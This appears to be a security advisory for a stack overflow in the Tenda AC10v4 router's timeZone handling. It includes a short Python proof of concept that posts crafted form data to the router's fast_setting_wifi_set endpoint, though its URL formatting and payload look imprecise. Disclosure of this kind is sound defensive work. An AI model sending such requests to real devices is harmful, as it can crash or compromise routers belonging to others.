Overview

• Firmware download website: https://www.tenda.com.cn/download/detail-3506.html

Affected version

AC10v4 V16.03.10.13

Vulnerability details

In the Tenda AC10v4 V16.03.10.13 has a stack overflow vulnerability located in the FUN_0044db3c function. This function accepts the timeZone parameter from a POST request by variable pcVar1.

However, since the user has control over the input of pcVar1, the statement sscanf(pcVar1 + 1,"%[^:]:%s",acStack_10,acStack_c) leads to a buffer overflow. The user-supplied pcVar1can exceed the capacity of the acStack_10 array, thus triggering this security vulnerability.

PoC

import requests

url = "<http://192.168.1.100:80/goform/fast_setting_wifi_set>"
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}
data = {
    "ssid": "fzq",
    "wrlPassword": "1",
    "power": "1",
    "loginPwd": "1111",
    "timeZone": "%3BywW%3E"
}

response = requests.post(url, headers=headers, data=data)

print("Status Code:", response.status_code)
print("Response Text:", response.text)

Discoverer

The vulnerability was discovered by Professor Wei Zhou's team (IoTS&P Lab) from the School of Cyber Science and Engineering at Huazhong University of Science and Technology.